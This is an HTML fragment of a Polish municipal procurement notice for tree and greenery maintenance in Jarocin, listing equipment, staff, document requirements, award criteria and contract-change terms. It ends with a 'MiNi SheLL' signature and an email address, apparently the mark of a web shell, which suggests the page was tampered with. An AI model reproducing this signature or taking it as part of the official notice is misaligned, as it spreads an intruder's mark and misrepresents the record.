<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca dysponuje lub będzie dysponował:
- podnośnik koszowy - min. 1 szt.,
- rębak do gałęzi - min. 1 szt.,
- frezarka do pni - min. 1 szt.,
- ciągnik rolniczy - min. 1 szt.,
- przyczepa rolnicza - min. 1 szt.,
- piły spalinowe - min. 3 szt.,
- kosy spalinowe - min. 5 szt.,
- traktorek do koszenia - min. 1 szt.,
- kosiarki spalinowe - min. 2 szt.,
- samochody dostawcze 3,5 t - min. 2 szt.,
- nożyce spalinowe do żywopłotów - min. 2 szt., 
- dmuchawy/odkurzacze spalinowe - min. 2 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca dysponuje lub będzie dysponował:
- minimum dwoma osobami posiadającymi uprawnienia pilarza,
- minimum jedną osobą posiadającą uprawnienia do kierowania ruchem</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania w/w warunku. 
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Główne usługi, których dotyczy obowiązek wskazania przez Wykonawcę 
w wykazie i złożenie dowodów, Zamawiający uważa usługi, o których mowa 
w dziale V pkt. 1 ppkt. 2 SIWZ oraz pkt. III.3.2) niniejszego ogłoszenia o zamówieniu.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ofertę stanowi prawidłowo wypełniony Formularz ofertowy (załącznik nr 1 do SIWZ) wraz z w/w załącznikami oraz:
1)	Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.
2)	Pełnomocnictwo, z którego wynika prawo do podpisania oferty, względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas reakcji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych (tj. z 2015 r., 
poz. 2164 z późn. zm.) Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty w następujących przypadkach:
1)	dopuszczalna jest zmiana umowy polegająca na zmianie terminu realizacji zamówienia wraz ze skutkami wprowadzenia tej zmiany w przypadku: 
a)	zaistnienia okoliczności zawartych w art. 67 ust. 1 pkt. 5 ustawy z dnia 
29 stycznia 2004 r. Prawo zamówień publicznych, 
b)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
c)	z powodu okoliczności siły wyższej, klęski żywiołowej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu, ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
2)	dopuszczalna jest zmiana umowy polegająca na zmianie wynagrodzenia za przedmiot zamówienia w przypadku, gdy ulegną zmianie powszechnie obowiązujące przepisy w zakresie wysokości stawki podatku od towarów i usług na przedmiot świadczenia. 
3)	dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy),
4)	dopuszczalne są zmiany postanowień umowy, które wynikają ze zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie postanowień umowy do nowego stanu prawnego,
5)	dopuszczalna jest zmiana numeru rachunku bankowego Wykonawcy, podanego 
w umowie, w przypadku zmiany rachunku bankowego Wykonawcy, na który następować ma zapłata wynagrodzenia za wykonanie przedmiotu niniejszego zamówienia,
2.	Wszelkie zmiany i uzupełnienia treści umowy wymagają zgody obu stron wyrażonej na piśmie pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jarocin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jarociński Fundusz Poręczeń Kredytowych Sp. z o.o., ul. T. Kościuszki 15B, 63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2016 godzina 10:00, miejsce: Urząd Miejski w Jarocinie - Kancelaria Burmistrza (pok. 32), ul. Al. Niepodległości 10, 63 - 200 Jarocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com